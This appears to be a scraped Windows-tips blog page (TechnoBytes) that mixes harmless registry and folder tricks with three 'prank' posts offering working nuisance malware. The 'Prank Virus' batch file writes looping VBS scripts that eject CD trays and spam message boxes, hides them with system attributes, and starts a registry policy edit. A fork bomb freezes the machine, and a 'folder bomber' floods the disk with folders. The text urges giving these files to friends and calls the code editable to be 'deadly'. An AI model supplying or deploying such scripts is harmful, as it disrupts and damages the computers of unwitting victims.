Skip to main content

Posts

How to Enable God Mode in Windows 7 (Secret Tricks) - TechnoBytes

How to Enable God Mode in Windows 7 (Secret Tricks) 1- You'll be creating a folder that will take you to the god mode folder. 2- It'll actually show you all the configurations and settings available in your Windows 7 Computer. 3- This trick works in almost all versions of Windows. Read the warning below. 4- Just create any folder and than rename it to the following code: God Mode.{ED7BA470-8E54-465E-825C-99712043E01C}

Error : Ping command is not recognised in cmd - TechnoBytes

Ping command is not recognised in cmd Right click "My Computer" and click "Properties". Click the "Advanced" tab up top followed by the "Environment Variables" button at the bottom. In the 2nd list box, scroll down to the 5th or 6th entry "Path", select it and click "Edit". Add "%SystemRoot%\system32;%SystemRoot%;" (minus the quotes) to the beginning of the line. Okay the changes and try out your commands now.

Disable USB Ports On Windows PC Via Registry

Disable USB Ports On Windows PC Via Registry With this trick, you can disable access to your USB(Universal Serial Bus) ports on your Windows based PC to prevent people from taking out data without permission or spreading viruses through the use of USB (pen and flash) drives. To use this trick to disable USB ports, follow the steps given below:- Click on Start. Click on Run. If you cannot find RUN, type it in the search box. Type "regedit" without quotes. This will launch the Registry Editor. Navigate to  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor. In the work area, double click on Start. In the Value Data box, enter 4. Click on OK. Close Registry Editor and refresh your desktop. To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6. Try it yourself to make your PC invulnerable from data theft and malware which spread through USB ports. This works on Windows XP, Windows Vista, Windows 7 and Windows 8. Note: This trick als...

Change Name Of Your Processor Permanently - TechnoBytes

Change Name Of Your Processor Permanently Change Processor Name Permanently Problem: To, make the name change permanent, it was required to update the Processor Name String registry key every time Windows starts. Solution: It is very easy to change your processor name permanently by creating a registry key and placing a shortcut to it in the Windows start up folder. To do so, just follow the steps given below:- Steps :- 1.  Open Notepad. 2.  Copy and paste the exact code given below:- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0] "ProcessorNameString"="My Processor name 50000MHz" To change the processor name, edit the part of the code given in blue. Also understand that \0 in the above code should only be present if Windows store your processor name at that location. Open the Registry Editor and navigate to the above mentioned keys to check whether or not to include the \0. 3.  Click on File Menu...

Prank Virus - TechnoBytes

Prank Virus ▼ Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly. @echo off echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs echo Set colCDROMs=oWMP.cdromCollection>>123.vbs echo do>>123.vbs echo if colCDROMs.count>=1 then>>123.vbs echo for i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo For i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo End If>>123.vbs echo wscript.sleep 5000>>123.vbs echo loop>>123.vbs echo DO>>1234.vbs echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs echo LOOP>>1234.vbs copy /y 123.vbs C:\ copy /y 1234.vbs C:\ attrib +s +h c:\123.vbs attrib +s +h c:\1234.vbs reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polici...

Fork Bomber - TechnoBytes

Fork Bomber ▼ It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste the below codes and save it as fork.bat :s<br />start %0<br />%0|%0<br />goto :s<br />

Folder Bomber Batch File - TechnoBytes

Folder Bomber This batch file will create 3000+ folder in less than a minute. Open your notepad and type the following codes. @echo off :top md %random% goto top Save it as 3000.bat Give this file to your friend and when he will click on that his nightmare will be started. Above Code Explained. @echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and %random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.